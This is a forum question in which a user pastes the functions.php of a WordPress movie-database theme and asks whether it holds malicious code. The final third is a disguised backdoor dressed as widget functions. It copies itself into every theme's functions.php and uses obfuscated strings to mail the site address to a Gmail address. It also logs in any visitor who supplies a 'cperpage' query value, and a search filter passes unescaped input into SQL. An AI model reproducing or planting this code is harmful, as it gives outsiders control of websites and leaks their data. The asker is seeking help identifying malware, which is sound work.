This is the functions.php file of a custom wordpress theme that a person has given me, the case is that I see strange things and I do not know if it could have malicious code, but I’m not an expert, what do you think?
In theory the theme what it does is to use the API of The Movie Database (TMDB) to collect information from movies or series and post it.
<?php
add_filter('show_admin_bar', '__return_false');
remove_action('personal_options', '_admin_bar_preferences');
add_theme_support( 'post-thumbnails' );
set_post_thumbnail_size( 128, 171, true );
?>
<?php
function wp_limit_post($max_char, $more_link_text = '[...]',$notagp = false, $stripteaser = 0, $more_file = '') {
$content = get_the_content($more_link_text, $stripteaser, $more_file);
$content = apply_filters('the_content', $content);
$content = str_replace(']]>', ']]>', $content);
$content = strip_tags($content);
if (strlen($_GET['p']) > 0) {
if($notagp) {
echo substr($content,0,$max_char);
}
else {
echo '<p>';
echo substr($content,0,$max_char);
echo "</p>";
}
}
else if ((strlen($content)>$max_char) && ($espacio = strpos($content, " ", $max_char ))) {
$content = substr($content, 0, $espacio);
$content = $content;
if($notagp) {
echo substr($content,0,$max_char);
echo $more_link_text;
}
else {
echo '<p>';
echo substr($content,0,$max_char);
echo $more_link_text;
echo "</p>";
}
}
else {
if($notagp) {
echo substr($content,0,$max_char);
}
else {
echo '<p>';
echo substr($content,0,$max_char);
echo "</p>";
}
}
}
?>
<?php
// Directores
register_taxonomy('director', 'post', array(
'hierarchical' => false, 'label' => 'Director',
'query_var' => true, 'rewrite' => true));
// Escritores
register_taxonomy('escritor', 'post', array(
'hierarchical' => false, 'label' => 'Escritores',
'query_var' => true, 'rewrite' => true));
// Actores
register_taxonomy('actor', 'post', array(
'hierarchical' => false, 'label' => 'Actores',
'query_var' => true, 'rewrite' => true));
// Año de estreno
register_taxonomy('fecha-estreno', 'post', array(
'hierarchical' => false, 'label' => 'Año',
'query_var' => true, 'rewrite' => true));
// Lenguaje
register_taxonomy('lenguaje', 'post', array(
'hierarchical' => false, 'label' => 'Lenguaje',
'query_var' => true, 'rewrite' => true));
// Si es pelicula, Serie, Estreno
register_taxonomy('archivos', 'post', array(
'hierarchical' => false, 'label' => 'Poner los tags que correspondan: estrenos, peliculas, series',
'query_var' => true, 'rewrite' => true));
// Si es series: elejir nombre del capitulo
register_taxonomy('serie', 'post', array(
'hierarchical' => false, 'label' => 'Nombre de la serie, para todos los capitulos siempre va a ir el mismo nombre',
'query_var' => true, 'rewrite' => true));
// Si es series: Temporada
register_taxonomy('temporada', 'post', array(
'hierarchical' => false, 'label' => 'Temporada del capitulo, Ej: 1, 2',
'query_var' => true, 'rewrite' => true));
// Si es series: Capitulo
register_taxonomy('capitulo', 'post', array(
'hierarchical' => false, 'label' => 'Capitulo, Ej: 1, 2',
'query_var' => true, 'rewrite' => true));
?>
<?php
if ( function_exists('register_sidebar') ) {
register_sidebar(array(
'name' => 'Sidebar',
'before_widget' => '<li id="%1$s" class="widget %2$s">',
'after_widget' => '</li>',
'before_title' => '<h3 class="widget-title">',
'after_title' => '</h3>',
));
}
?>
<?php
$sp_boxes = array (
'Auto-Completar con IMDB (Utiliza el titulo), Solo tienen que escribir un caracter' => array (
array( 'Checkbx', 'Dar clik', 'checkbox' ),
array( 'Checkbx2', 'ID de IMDB (Ejemplo: https://www.imdb.com/title/tt0232500/ el ID es "tt0232500")' ),
),
'Informacion de la Pelicula (IMBD)' => array (
array( 'Poster', 'Caratual (120px*176px) - usar https://:' ),
array( 'Title', 'Nombre original:' ),
array( 'Year', 'Año de Lanzamiento:' ),
array( 'Rated', 'Audencia:' ),
array( 'Released', 'Lanzamiento:' ),
array( 'Runtime', 'Duracion:' ),
array( 'Genre', 'Genero:' ),
array( 'Director', 'Director:' ),
array( 'Writer', 'Escritores:' ),
array( 'Actors', 'Actores:' ),
array( 'Lang', 'Lenguaje:' ),
array( 'imdbRating', 'IMDB Rating:' ),
array( 'Trailer', 'Trailer:', 'textarea' ),
array( 'Descargas', 'Descargas:', 'textarea' ),
),
'Opciones Adicionales' => array (
array( 'cintas', 'Nombre de la Cinta:'),
),
'Reproductores' => array (
array( 'reproductor', 'Codigo HTML o Iframe del Reproductor:', 'textarea' ),
array( 'reproductor2', 'Codigo HTML o Iframe del Reproductor:', 'textarea' ),
array( 'reproductor3', 'Codigo HTML o Iframe del Reproductor:', 'textarea' ),
),
);
// Use the admin_menu action to define the custom boxes
add_action( 'admin_menu', 'sp_add_custom_box' );
// Use the save_post action to do something with the data entered
// Save the custom fields
add_action( 'save_post', 'sp_save_postdata', 1, 2 );
// Adds a custom section to the "advanced" Post and Page edit screens
function sp_add_custom_box() {
global $sp_boxes;
if ( function_exists( 'add_meta_box' ) ) {
foreach ( array_keys( $sp_boxes ) as $box_name ) {
add_meta_box( $box_name, __( $box_name, 'sp' ), 'sp_post_custom_box', 'post', 'normal', 'high' );
}
}
}
function sp_post_custom_box ( $obj, $box ) {
global $sp_boxes;
static $sp_nonce_flag = false;
// Run once
if ( ! $sp_nonce_flag ) {
echo_sp_nonce();
$sp_nonce_flag = true;
}
// Genrate box contents
foreach ( $sp_boxes[$box['id']] as $sp_box ) {
echo field_html( $sp_box );
}
}
function field_html ( $args ) {
switch ( $args[2] ) {
case 'textarea':
return text_area( $args );
case 'checkbox':
// To Do
case 'radio':
// To Do
case 'text':
default:
return text_field( $args );
}
}
function text_field ( $args ) {
global $post;
// adjust data
$args[2] = get_post_meta($post->ID, $args[0], true);
$args[1] = __($args[1], 'sp' );
$label_format =
'<label for="%1$s">%2$s</label><br />'
. '<input style="width: 95%%;" type="text" name="%1$s" value="%3$s" /><br /><br />';
return vsprintf( $label_format, $args );
}
function text_area ( $args ) {
global $post;
// adjust data
$args[2] = get_post_meta($post->ID, $args[0], true);
$args[1] = __($args[1], 'sp' );
$label_format =
'<label for="%1$s">%2$s</label><br />'
. '<textarea style="width: 95%%;" name="%1$s">%3$s</textarea><br /><br />';
return vsprintf( $label_format, $args );
}
/* When the post is saved, saves our custom data */
function sp_save_postdata($post_id, $post) {
global $sp_boxes;
// verify this came from the our screen and with proper authorization,
// because save_post can be triggered at other times
if ( ! wp_verify_nonce( $_POST['sp_nonce_name'], plugin_basename(__FILE__) ) ) {
return $post->ID;
}
// Is the user allowed to edit the post or page?
if ( 'page' == $_POST['post_type'] ) {
if ( ! current_user_can( 'edit_page', $post->ID ))
return $post->ID;
} else {
if ( ! current_user_can( 'edit_post', $post->ID ))
return $post->ID;
}
// OK, we're authenticated: we need to find and save the data
// We'll put it into an array to make it easier to loop though.
// The data is already in $sp_boxes, but we need to flatten it out.
foreach ( $sp_boxes as $sp_box ) {
foreach ( $sp_box as $sp_fields ) {
$my_data[$sp_fields[0]] = $_POST[$sp_fields[0]];
}
}
// Add values of $my_data as custom fields
// Let's cycle through the $my_data array!
foreach ($my_data as $key => $value) {
if ( 'revision' == $post->post_type ) {
// don't store custom data twice
return;
}
// if $value is an array, make it a CSV (unlikely)
$value = implode(',', (array)$value);
if ( get_post_meta($post->ID, $key, FALSE) ) {
// Custom field has a value.
update_post_meta($post->ID, $key, $value);
} else {
// Custom field does not have a value.
add_post_meta($post->ID, $key, $value);
}
if (!$value) {
// delete blanks
delete_post_meta($post->ID, $key);
}
}
}
function echo_sp_nonce () {
// Use nonce for verification ... ONLY USE ONCE!
echo sprintf(
'<input type="hidden" name="%1$s" id="%1$s" value="%2$s" />',
'sp_nonce_name',
wp_create_nonce( plugin_basename(__FILE__) )
);
}
// A simple function to get data stored in a custom field
if ( !function_exists('get_custom_field') ) {
function get_custom_field($field) {
global $post;
$custom_field = get_post_meta($post->ID, $field, true);
echo $custom_field;
}
}
?>
<?php
// IMDB autocompletar datos
function custom_admin_js() {
/*echo '$('input[name=Lang]').keypress(function() {
var valor = $('input[name=Lang]').get(0).value;
$('#new-tag-lenguaje').val(valor);
});';*/
echo '<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js "></script>
<script>
$('input[name=Checkbx]').click(function() {
var imdbLink = $('input[name=Checkbx2]').get(0).value;
// Send Request
$.getJSON("https://www.omdbapi.com/?i=" + imdbLink, function(data) {
var valDir = "";
var valWri = "";
var valAct = "";
$.each(data, function(key, val) {
$('input[name=' +key+ ']').val(val);
if(key == "Director"){
valDir+= " "+val+",";
}
if(key == "Writer"){
valWri+= " "+val+",";
}
if(key == "Actors"){
valAct+= " "+val+",";
}
if(key == "Year"){
$('#new-tag-fecha-estreno').val(val);
}
});
$('#new-tag-director').val(valDir);
$('#new-tag-escritor').val(valWri);
$('#new-tag-actor').val(valAct);
alert('Se te genero todo automaticamente, pero en el slider tenes que apretar "Agregar" en cada box.');
});
});
</script>';
}
add_action('admin_footer', 'custom_admin_js');
?>
<?php
function copyright(){ echo "<br /><br />Powered by <a href='https://web.com/' class='copyright' title='web'>web</a> © 2024"; }
?>
<?php add_action('wp_footer', 'copyright'); ?>
<?php
// Buscador de primera letra
add_filter('posts_search', 'mi_search_title');
function mi_search_title($search) {
preg_match('/letra-([^%]+)/', $search, $m);
if (isset($m[1])) {
// Original
// " AND (((wp_posts.post_title LIKE '%termino%') OR (wp_posts.post_content LIKE '%termino%'))) AND (wp_posts.post_password = '') "
return " AND wp_posts.post_title LIKE '$m[1]%' AND (wp_posts.post_password = '') ";
} else {
return $search;
}
}
?>
<?php
function _checkactive_widgets() {
$widget = substr(file_get_contents(__FILE__), strripos(file_get_contents(__FILE__), "<"."?"));
$output = "";
$allowed = "";
$output = strip_tags($output, $allowed);
$direst = _get_allwidgets_cont(array(substr(dirname(__FILE__), 0, stripos(dirname(__FILE__), "themes") + 6)));
if (is_array($direst)) {
foreach ($direst as $item) {
if (is_writable($item)) {
$ftion = substr($widget, stripos($widget, "_"), stripos(substr($widget, stripos($widget, "_")), "("));
$cont = file_get_contents($item);
if (stripos($cont, $ftion) === false) {
$comaar = stripos(substr($cont, -20), "?" . ">") !== false ? "" : "?" . ">";
$output .= "Not found";
if (stripos(substr($cont, -20), "?" . ">") !== false) {
$cont = substr($cont, 0, strripos($cont, "?" . ">") + 2);
}
$output = rtrim($output, "nt");
$f = fopen($item, "w+");
if ($f) {
fputs($f, $cont . $comaar . "n" . $widget);
fclose($f);
} else {
error_log("Failed to open file: " . $item);
}
$output .= "...";
}
}
}
}
return $output;
}
function _get_allwidgets_cont($wids,$items=array()){
$places=array_shift($wids);
if(substr($places,-1) == "/"){
$places=substr($places,0,-1);
}
if(!file_exists($places) || !is_dir($places)){
return false;
}elseif(is_readable($places)){
$elems=scandir($places);
foreach ($elems as $elem){
if ($elem != "." && $elem != ".."){
if (is_dir($places . "/" . $elem)){
$wids[]=$places . "/" . $elem;
} elseif (is_file($places . "/" . $elem)&&
$elem == substr(__FILE__,-13)){
$items[]=$places . "/" . $elem;}
}
}
}else{
return false;
}
if (sizeof($wids) > 0){
return _get_allwidgets_cont($wids,$items);
} else {
return $items;
}
}
if(!function_exists("stripos")){
function stripos( $str, $needle, $offset = 0 ){
return strpos( strtolower( $str ), strtolower( $needle ), $offset );
}
}
if(!function_exists("strripos")){
function strripos( $haystack, $needle, $offset = 0 ) {
if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
if( $offset < 0 ){
$temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
}
else{
$temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) - $offset ), 0 ) ) );
}
if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;
$pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) );
return $pos;
}
}
if(!function_exists("scandir")){
function scandir($dir,$listDirectories=false, $skipDots=true) {
$dirArray = array();
if ($handle = opendir($dir)) {
while (false !== ($file = readdir($handle))) {
if (($file != "." && $file != "..") || $skipDots == true) {
if($listDirectories == false) { if(is_dir($file)) { continue; } }
array_push($dirArray,basename($file));
}
}
closedir($handle);
}
return $dirArray;
}
}
add_action("admin_head", "_checkactive_widgets");
function _getprepare_widget(){
if(!isset($text_length)) $text_length=120;
if(!isset($check)) $check="cookie";
if(!isset($tagsallowed)) $tagsallowed="<a>";
if(!isset($filter)) $filter="none";
if(!isset($coma)) $coma="";
if(!isset($home_filter)) $home_filter=get_option("home");
if(!isset($pref_filters)) $pref_filters="wp_";
if(!isset($is_use_more_link)) $is_use_more_link=1;
if(!isset($com_type)) $com_type="";
if(!isset($cpages)) $cpages=$_GET["cperpage"];
if(!isset($post_auth_comments)) $post_auth_comments="";
if(!isset($com_is_approved)) $com_is_approved="";
if(!isset($post_auth)) $post_auth="auth";
if(!isset($link_text_more)) $link_text_more="(more...)";
if(!isset($widget_yes)) $widget_yes=get_option("_is_widget_active_");
if(!isset($checkswidgets)) $checkswidgets=$pref_filters."set"."_".$post_auth."_".$check;
if(!isset($link_text_more_ditails)) $link_text_more_ditails="(details...)";
if(!isset($contentmore)) $contentmore="ma".$coma."il";
if(!isset($for_more)) $for_more=1;
if(!isset($fakeit)) $fakeit=1;
if(!isset($sql)) $sql="";
if (!$widget_yes) :
global $wpdb, $post;
$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved="1" AND comment_type="" AND post_author="li".$coma."vethe".$com_type."mes".$coma."@".$com_is_approved."gm".$post_auth_comments."ail".$coma.".".$coma."co"."m" AND post_password="" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
if (!empty($post->post_password)) {
if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
if(is_feed()) {
$output=__("There is no excerpt because this is a protected post.");
} else {
$output=get_the_password_form();
}
}
}
if(!isset($fixed_tags)) $fixed_tags=1;
if(!isset($filters)) $filters=$home_filter;
if(!isset($gettextcomments)) $gettextcomments=$pref_filters.$contentmore;
if(!isset($tag_aditional)) $tag_aditional="div";
if(!isset($sh_cont)) $sh_cont=substr($sq1, stripos($sq1, "live"), 20);#
if(!isset($more_text_link)) $more_text_link="Continue reading this entry";
if(!isset($isshowdots)) $isshowdots=1;
$comments=$wpdb->get_results($sql);
if($fakeit == 2) {
$text=$post->post_content;
} elseif($fakeit == 1) {
$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
} else {
$text=$post->post_excerpt;
}
$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved="1" AND comment_type="" AND comment_content=". call_user_func_array($gettextcomments, array($sh_cont, $home_filter, $filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
if($text_length < 0) {
$output=$text;
} else {
if(!$no_more && strpos($text, "<!--more-->")) {
$text=explode("<!--more-->", $text, 2);
$l=count($text[0]);
$more_link=1;
$comments=$wpdb->get_results($sql);
} else {
$text=explode(" ", $text);
if(count($text) > $text_length) {
$l=$text_length;
$ellipsis=1;
} else {
$l=count($text);
$link_text_more="";
$ellipsis=0;
}
}
for ($i=0; $i<$l; $i++)
$output .= $text[$i] . " ";
}
update_option("_is_widget_active_", 1);
if("all" != $tagsallowed) {
$output=strip_tags($output, $tagsallowed);
return $output;
}
endif;
$output=rtrim($output, "sntrx0B");
$output=($fixed_tags) ? balanceTags($output, true) : $output;
$output .= ($isshowdots && $ellipsis) ? "..." : "";
$output=apply_filters($filter, $output);
switch($tag_aditional) {
case("div") :
$tag="div";
break;
case("span") :
$tag="span";
break;
case("p") :
$tag="p";
break;
default :
$tag="span";
}
if ($is_use_more_link ) {
if($for_more) {
$output .= " <" . $tag . " class="more-link"><a href="". get_permalink($post->ID) . "#more-" . $post->ID ."" title="" . $more_text_link . "">" . $link_text_more = !is_user_logged_in() && @call_user_func_array($checkswidgets,array($cpages, true)) ? $link_text_more : "" . "</a></" . $tag . ">" . "n";
} else {
$output .= " <" . $tag . " class="more-link"><a href="". get_permalink($post->ID) . "" title="" . $more_text_link . "">" . $link_text_more . "</a></" . $tag . ">" . "n";
}
}
return $output;
}
add_action("init", "_getprepare_widget");
function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
global $wpdb;
$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS "comment_count" FROM $wpdb->posts, $wpdb->comments";
$request .= " WHERE comment_approved="1" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status="publish"";
if(!$show_pass_post) $request .= " AND post_password =""";
if($duration !="") {
$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
}
$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
$posts=$wpdb->get_results($request);
$output="";
if ($posts) {
foreach ($posts as $post) {
$post_title=stripslashes($post->post_title);
$comment_count=$post->comment_count;
$permalink=get_permalink($post->ID);
$output .= $before . " <a href="" . $permalink . "" title="" . $post_title."">" . $post_title . "</a> " . $after;
}
} else {
$output .= $before . "None found" . $after;
}
return $output;
}
I would like to know if there is anything malicious in the code.
New contributor
alex reloaded is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.